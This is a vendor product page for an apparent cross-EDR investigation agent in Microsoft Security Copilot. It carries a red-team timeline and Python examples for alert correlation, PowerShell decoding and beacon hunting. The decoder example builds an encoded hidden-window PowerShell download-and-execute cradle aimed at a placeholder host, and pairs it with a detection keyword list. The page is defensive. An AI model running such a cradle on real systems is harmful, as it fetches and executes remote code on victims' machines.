Lockbase Open XDR — Cross-EDR Investigation Coach for Microsoft Security Copilot
Investigate alerts in CrowdStrike Falcon and Microsoft Defender for Endpoint side by side, inside Security Copilot.
[ DESIGNED FOR ]
Designed for organizations running CrowdStrike Falcon as their primary active EDR alongside Microsoft Defender for Endpoint in passive mode. Defender contributes raw endpoint, identity, email, and cloud-app telemetry through Advanced Hunting while Falcon handles active prevention on the host.
> Three-paragraph technical brief. No marketing fluff. Read top to bottom — it walks the agent's job from input to output.
LOX Agent (Lockbase Open XDR) is a cross-EDR investigation coach designed for organizations running CrowdStrike Falcon as their primary active EDR alongside Microsoft Defender for Endpoint in passive mode, where Defender contributes raw endpoint, identity, email, and cloud-app telemetry through Advanced Hunting while Falcon handles active prevention on the host. LOX Agent unifies both inside Microsoft Security Copilot — treating Falcon's detections and Defender's raw telemetry as complementary signals on the same incident rather than parallel tools — and adds Microsoft Threat Intelligence enrichment plus a built-in library of KQL hunting skills to surface activity that neither product alerted on directly.
Analysts pose their question in plain language — a device name, user, IP, file hash, alert ID, or "what happened on this device today?" — and LOX Agent investigates by correlating CrowdStrike alerts with Defender telemetry for the same device or user, enriching every suspicious IP, domain, file hash, and CVE through Microsoft Threat Intelligence, and hunting for attacker techniques across endpoint, identity, email, and cloud activity. It flags CrowdStrike detections that fired but did not block the threat so unprevented attacks stand out, and reports when a Falcon sensor is in a degraded state so analysts know when an endpoint's prevention is reduced.
Each investigation returns a clear-priority summary (Critical, High, Medium, Low) with a plain-English narrative of what happened, a side-by-side view showing where Falcon's prevention layer and Defender's telemetry agree, disagree, or each surface evidence the other missed, concrete containment and remediation steps the analyst can act on immediately, and every finding labeled with its data source — coaching Level 1 and Level 2 analysts step by step from question to closed ticket.
Falcon detections and Defender telemetry on the same device, user, and incident — no more pivoting between consoles.
Every suspicious IP, domain, file hash, and CVE auto-enriched through MDTI and shown inline in the investigation.
Built-in hunts across endpoint, identity, email, and cloud activity — surface what neither product alerted on directly.
Falcon detections that fired but did not block are surfaced as P1-Critical so unprevented attacks stand out.
Reports when a Falcon sensor is in a degraded state (Reduced Functionality Mode, RFM) so analysts know when an endpoint's prevention is reduced.
Designed for L1 and L2 SOC analysts — every finding labeled with its data source, with concrete containment steps.
In a controlled red-team simulation, an adversary gained execution, dumped credentials, established persistence twice over, and quietly beaconed to attacker infrastructure. CrowdStrike raised 8 alerts, Defender raised 20 — and the C2 beacon appeared in neither product's alert queue. LOX Agent stitched all of it into one investigation.
| Time | Phase | Attacker action | CrowdStrike | Defender |
|---|---|---|---|---|
| T+0 | Initial Access / Execution | Remote script download and in-memory execution | ✓ Caught (detection-only alert) | ✓ First (earliest signal) |
| T+1m | Execution | Second-stage payload retrieved | ✓ Caught (2 alerts) | — |
| T+2m | Defense Evasion | Code injected into a trusted system process | — | ✓ Caught |
| T+3m | Discovery | Host and domain reconnaissance burst | — | ✓ Caught (discovery cluster) |
| T+5m | Persistence | Scheduled task installed to run as SYSTEM | — | ✓ Caught |
| T+6m | Persistence | Second persistence mechanism planted, disguised as a software updater | ✓ Caught (2 alerts) | — |
| T+7m | Credential Access | Credentials dumped from memory | ✓ Caught (detection-only alert) | — |
| T+10m | Command & Control | Implant begins low-and-slow beaconing to attacker infrastructure (surfaced by LOX Agent from raw telemetry; no alert existed in either product) | — | — |
| T+15m | Exfiltration | Staged data exfiltrated to an anonymous file-sharing service | ✓ Caught (detection-only alert) | ✓ Caught (suspicious transfer) |
Timeline simplified from a controlled red-team exercise. CrowdStrike fired 8 detection-only alerts (none prevented); Defender fired 20.
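The stitching the timeline above describes boils down to three mechanical steps: normalize both vendors' alerts into one record shape keyed by device, sort them into a single source-labeled timeline, and apply the priority rules the page states (a Falcon detection that fired but did not block becomes P1-Critical; a sensor in RFM gets a warning). The script below is an added example of that logic, not LOX Agent's code; the Falcon and Defender records, the device names, and the `pattern_disposition` / `SENSOR_STATE` fields are constructed in a simplified shape and are not the real vendor schemas.

```python
"""Cross-EDR correlation: merge CrowdStrike Falcon detections and Defender
alerts for one device into a single source-labeled timeline, escalate Falcon
detections that fired but did not block, and flag a sensor in Reduced
Functionality Mode. Added example, not LOX Agent's code; all records below are
constructed in a simplified shape, not the real vendor schemas."""
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed sample records (hypothetical field names).
FALCON_DETECTIONS = [
    {"device": "WS-042", "ts": "2024-05-01T10:00:00Z", "tactic": "Execution",
     "name": "Suspicious script download", "pattern_disposition": "detection_only",
     "severity": "high"},
    {"device": "WS-042", "ts": "2024-05-01T10:07:00Z", "tactic": "Credential Access",
     "name": "LSASS memory read", "pattern_disposition": "detection_only",
     "severity": "critical"},
    {"device": "WS-042", "ts": "2024-05-01T10:20:00Z", "tactic": "Execution",
     "name": "Malicious binary blocked", "pattern_disposition": "prevented",
     "severity": "medium"},
    {"device": "SRV-07", "ts": "2024-05-01T11:00:00Z", "tactic": "Persistence",
     "name": "Service created", "pattern_disposition": "prevented", "severity": "low"},
]
DEFENDER_ALERTS = [
    {"DeviceName": "ws-042.corp.local", "Timestamp": "2024-05-01T10:00:10Z",
     "Category": "Execution", "Title": "Suspicious PowerShell download cradle",
     "Severity": "Medium"},
    {"DeviceName": "ws-042.corp.local", "Timestamp": "2024-05-01T10:02:00Z",
     "Category": "DefenseEvasion", "Title": "Process injection into trusted process",
     "Severity": "High"},
]
# Constructed Falcon sensor status per device ("rfm" = Reduced Functionality Mode).
SENSOR_STATE = {"WS-042": "normal", "SRV-07": "rfm"}

SEVERITY_TO_PRIORITY = {"critical": "P1-Critical", "high": "P2-High",
                        "medium": "P3-Medium", "low": "P4-Low"}
PRIORITY_ORDER = ["P1-Critical", "P2-High", "P3-Medium", "P4-Low"]


@dataclass
class Finding:
    ts: datetime
    device: str
    source: str       # "CrowdStrike" or "Defender": every finding carries its data source
    phase: str
    title: str
    priority: str
    note: str = ""    # non-empty when the finding needs analyst attention beyond severity


def _device_key(name: str) -> str:
    """Both products name hosts differently; join on the upper-cased short hostname."""
    return name.split(".")[0].upper()


def _phase(category: str) -> str:
    """Defender categories are CamelCase ("DefenseEvasion"); split into words."""
    return re.sub(r"(?<=[a-z])(?=[A-Z])", " ", category)


def _parse_ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalize_falcon(d: dict) -> Finding:
    priority, note = SEVERITY_TO_PRIORITY[d["severity"].lower()], ""
    if d["pattern_disposition"] == "detection_only":
        # Fired but did not block: the threat may still be live on the host.
        priority, note = "P1-Critical", "detected but not prevented"
    return Finding(_parse_ts(d["ts"]), _device_key(d["device"]), "CrowdStrike",
                   d["tactic"], d["name"], priority, note)


def normalize_defender(a: dict) -> Finding:
    return Finding(_parse_ts(a["Timestamp"]), _device_key(a["DeviceName"]), "Defender",
                   _phase(a["Category"]), a["Title"], SEVERITY_TO_PRIORITY[a["Severity"].lower()])


def build_timeline(device, falcon=FALCON_DETECTIONS, defender=DEFENDER_ALERTS):
    """One time-ordered list of findings from both products for a device."""
    key = _device_key(device)
    items = [normalize_falcon(d) for d in falcon] + [normalize_defender(a) for a in defender]
    return sorted((f for f in items if f.device == key), key=lambda f: f.ts)


def summarize(device, sensor_state=SENSOR_STATE):
    """Overall priority plus where the two products agree or each saw something alone."""
    timeline, key = build_timeline(device), _device_key(device)
    phases = {"CrowdStrike": set(), "Defender": set()}
    for f in timeline:
        phases[f.source].add(f.phase)
    cs, de = phases["CrowdStrike"], phases["Defender"]
    priorities = [f.priority for f in timeline]
    return {
        "device": key,
        "overall_priority": min(priorities, key=PRIORITY_ORDER.index) if priorities else None,
        "findings": len(timeline),
        "unprevented": sum(1 for f in timeline if f.note),
        "phases_both": sorted(cs & de),
        "phases_crowdstrike_only": sorted(cs - de),
        "phases_defender_only": sorted(de - cs),
        "sensor_warning": sensor_state.get(key) == "rfm",
    }


if __name__ == "__main__":
    for host in ("ws-042.corp.local", "SRV-07"):
        print(summarize(host))
        for f in build_timeline(host):
            print(f"  {f.ts:%H:%M:%S} [{f.source}] {f.priority} {f.phase}: {f.title} {f.note}")
```

The join key is the short hostname because the two products report the same machine under different names; in practice you would carry the Defender device id and Falcon agent id alongside it so that renamed or re-imaged hosts do not silently split into two timelines.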
A built-in library of investigation skills, categorized by attacker phase. Each category is a set of named capabilities the agent invokes inline — analysts never write the underlying queries by hand.
Cross-EDR alert aggregation
One pane across Defender XDR, MDE, MDI, MDO, MCAS, and CrowdStrike Falcon.
e.g. Unified alert view: Every alert raised against a device or user — across both vendors — in a single answer, no console-hopping.
Process trees, IOC sweeps, masquerading, encoded PowerShell, and exploit chains.
e.g. Obfuscated command analysis: Surfaces hidden and encoded attacker commands and decodes them inline during triage.
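The most common encoded form an analyst meets in process telemetry is PowerShell's `-EncodedCommand` argument, which carries the script as base64 of UTF-16LE text and is accepted under abbreviated parameter names (`-e`, `-enc`, `-ec`, ...). The decoder below is an added example of that inline decoding, not LOX Agent's code; the sample command line, the documentation-range address 203.0.113.10, and the indicator list are constructed, and the indicator list is a starting point you would extend from your own detection content.

```python
"""Decode PowerShell -EncodedCommand payloads found in process command lines
and flag common download-and-execute indicators in the decoded text.
Added example, not LOX Agent's code; the sample command line is constructed."""
import base64
import re

# A parameter name followed by a base64-looking token. The flag check below
# accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) and the -ec alias.
FLAG_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")

# Substrings that, in decoded PowerShell, usually indicate download-and-execute
# behaviour; matched case-insensitively. Constructed starting list.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "downloadfile", "invoke-webrequest")


def _is_encoded_flag(flag: str) -> bool:
    flag = flag.lower()
    return flag == "ec" or (flag.startswith("e") and "encodedcommand".startswith(flag))


def decode_utf16_b64(blob: str):
    """PowerShell base64-encodes the UTF-16LE script; return None when the
    token is not valid base64 or does not decode to whole UTF-16 code units."""
    try:
        raw = base64.b64decode(blob, validate=True)
        if len(raw) % 2:
            return None
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str):
    """Return one entry per decodable encoded command, with matched indicators."""
    hits = []
    for m in FLAG_RE.finditer(cmdline):
        flag, blob = m.group(1), m.group(2)
        if not _is_encoded_flag(flag):
            continue
        decoded = decode_utf16_b64(blob)
        if decoded is None:
            continue
        lowered = decoded.lower()
        hits.append({
            "flag": "-" + flag,
            "decoded": decoded,
            "indicators": [i for i in INDICATORS if i in lowered],
        })
    return hits


# Constructed sample: a hidden-window download cradle encoded the way
# PowerShell expects, alongside a benign administrative command line.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/u.ps1')"
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -Enc "
                  + base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode())
BENIGN_CMDLINE = "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"

if __name__ == "__main__":
    for cmd in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        hits = analyze_command_line(cmd)
        print(cmd[:60] + ("..." if len(cmd) > 60 else ""))
        if not hits:
            print("  no encoded command")
        for hit in hits:
            print(f"  {hit['flag']}: {hit['decoded']}")
            print(f"  indicators: {hit['indicators']}")
```

Decoding only covers the first layer: an encoded command frequently contains a second `FromBase64String` or compressed stage, so in triage the decoded text is fed back through the same analysis until no further encoding is found.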
Sign-in risk, AiTM phishing, OAuth abuse, BEC, and mailbox tampering.
e.g. Phish-to-compromise correlation: Connects a phishing email to the click, the sign-in that followed, and the endpoint it landed on.
LSASS, NTDS, SAM, and pass-the-hash.
e.g. Credential-theft sweep: Flags credential dumping and domain-database access attempts across both EDRs in one pass.
Scheduled tasks, services, registry hooks, COM hijacks, and UAC bypass.
e.g. Foothold discovery: Finds where an attacker has dug in for the long haul — and which footholds are quietly calling out.
SMB, DCOM, WinRM, NTLM relay, RMM tools, and AD reconnaissance.
e.g. Blast-radius mapping: Shows where an intruder went next — and which other hosts show the same activity.
Beaconing, Cobalt Strike, DNS tunneling, and anti-forensics.
e.g. Beacon hunting: Finds periodic outbound traffic patterns in raw telemetry — including activity neither EDR alerted on.
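The timeline earlier on the page shows why this skill runs over raw telemetry rather than the alert queue: the T+10m beacon produced no alert in either product. The hunt reduces to grouping outbound connections by (device, destination), measuring how regular the gaps between them are, and reporting pairs with enough connections and low jitter. The script below is an added example of that periodicity test, not LOX Agent's code or its KQL; the connection events, hostnames and documentation-range addresses are constructed, and the thresholds (`min_connections`, `max_cv`) are assumptions to tune against your own baseline.

```python
"""Beacon hunting over raw outbound-connection telemetry: find (device,
destination) pairs whose connection intervals are regular enough to look like
a C2 check-in, independent of whether any product alerted. Added example, not
LOX Agent's code; every event below is constructed."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone


def _series(device, dest, start, gaps_seconds):
    """Build constructed connection events from a list of inter-connection gaps."""
    t, events = start, [(device, dest, start)]
    for g in gaps_seconds:
        t += timedelta(seconds=g)
        events.append((device, dest, t))
    return events


START = datetime(2024, 5, 1, 10, 10, tzinfo=timezone.utc)
EVENTS = (
    # Low-and-slow implant: roughly a 10-minute period with modest jitter.
    _series("WS-042", "198.51.100.23:443", START,
            [620, 565, 650, 590, 605, 552, 630, 575, 615, 560, 642, 592])
    # Ordinary browsing to the same kind of port: bursty, no stable period.
    + _series("WS-042", "203.0.113.80:443", START,
              [3, 120, 7, 480, 15, 900, 2, 60, 300, 9, 45, 700])
    # Two connections only: not enough evidence to call it anything.
    + _series("SRV-07", "198.51.100.23:443", START, [600])
)


def hunt_beacons(events, min_connections=8, max_cv=0.2):
    """Return candidate beacons: pairs with at least min_connections events whose
    inter-connection gaps have a coefficient of variation (stdev / mean) <= max_cv.
    Three events are always required so that a standard deviation exists."""
    by_pair = defaultdict(list)
    for device, dest, ts in events:
        by_pair[(device, dest)].append(ts)

    candidates = []
    for (device, dest), times in by_pair.items():
        if len(times) < max(min_connections, 3):
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:          # all events share a timestamp: a burst, not a beacon
            continue
        cv = statistics.stdev(gaps) / mean
        if cv <= max_cv:
            candidates.append({
                "device": device,
                "destination": dest,
                "connections": len(times),
                "period_s": round(mean, 1),
                "jitter_cv": round(cv, 3),
                "first_seen": times[0].isoformat(),
                "last_seen": times[-1].isoformat(),
            })
    # Most regular first: the tightest period is the strongest candidate.
    return sorted(candidates, key=lambda c: c["jitter_cv"])


if __name__ == "__main__":
    for c in hunt_beacons(EVENTS):
        print(f"{c['device']} -> {c['destination']}: {c['connections']} connections, "
              f"period {c['period_s']}s, jitter CV {c['jitter_cv']}")
```

A coefficient-of-variation test is deliberately simple: it catches fixed-interval check-ins with bounded jitter, which is the low-and-slow case in the timeline, but not a beacon whose interval is randomized across a wide range. On production telemetry the same grouping is run over a day or more of connection events per host, and destinations that many hosts contact (update servers, telemetry endpoints) are suppressed by prevalence before an analyst sees the list.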
Cloud copy-out, archive staging, HTML smuggling, and ransomware indicators.
e.g. Exfil staging detection: Spots data being archived, staged, and pushed to outside services — the quiet phase before the ransom note.
URLhaus, LOLDrivers, and LOLBAS feeds correlated with your telemetry.
e.g. Fresh-intel sweep: Checks the day's threat feeds against your real telemetry — not just your alert queue.
ClickFix-style lures and modern social-engineering chains.
e.g. Social-engineering chain tracing: Follows a lure from the user action that started it to everything it executed afterward.
Reputation, prevalence, vulnerability, and identity context for any indicator.
e.g. One-question enrichment: Reputation, prevalence, and vulnerability context for any file, host, or user — without leaving the investigation.
We walk through the complete catalog — every skill, live, against real telemetry — in a demo.
Vector schematics that document how the agent actually moves data — system architecture and a worked cross-vendor use case. No hand-drawn boxes; every arrow is an actual API call.
End-to-end view of how LOX Agent orchestrates CrowdStrike Falcon, Microsoft Defender XDR, and Microsoft Threat Intelligence inside a Security Copilot workspace.
Worked example showing LOX Agent stitching a Defender phishing alert to CrowdStrike endpoint telemetry and MDTI infrastructure context.
LOX Agent consumes approximately 0.3–1.5 SCU per triage run, depending on investigation depth.
| Run type | Approx. SCU |
|---|---|
| Single-alert cross-EDR correlation | ~0.3–0.5 |
| Standard triage (3–5 indicator enrichments, 10–15 KQL hunts) | ~0.6–1.0 |
| Full investigation (20+ hunting skills) | ~1.0–1.5 |
| Extended hunts | +~0.2 per additional 1 GB of Defender Advanced Hunting log data |
SCU (Security Compute Units) are billed by Microsoft Security Copilot at the workspace level.
To deploy LOX Agent into your Microsoft Security Copilot workspace you'll need:
alerts:read and devices:read scopes
Setup guide
Step-by-step deployment for Security Copilot and LOX Agent's integrations: CrowdStrike Falcon, Microsoft Defender for Endpoint, Microsoft Defender Threat Intelligence, Microsoft Security Copilot.
Contact us for early access →
Cross-EDR kill chain playbook
Six prompts that take an analyst from "something looks weird on a host" to a full incident report.
Request the playbook →
Microsoft Security Store listing
Listing pending Microsoft Partner Center review.
Coming soon
LockBase Cyber support
Implementation help, custom hunting skills, or detection engineering services.
Email the team →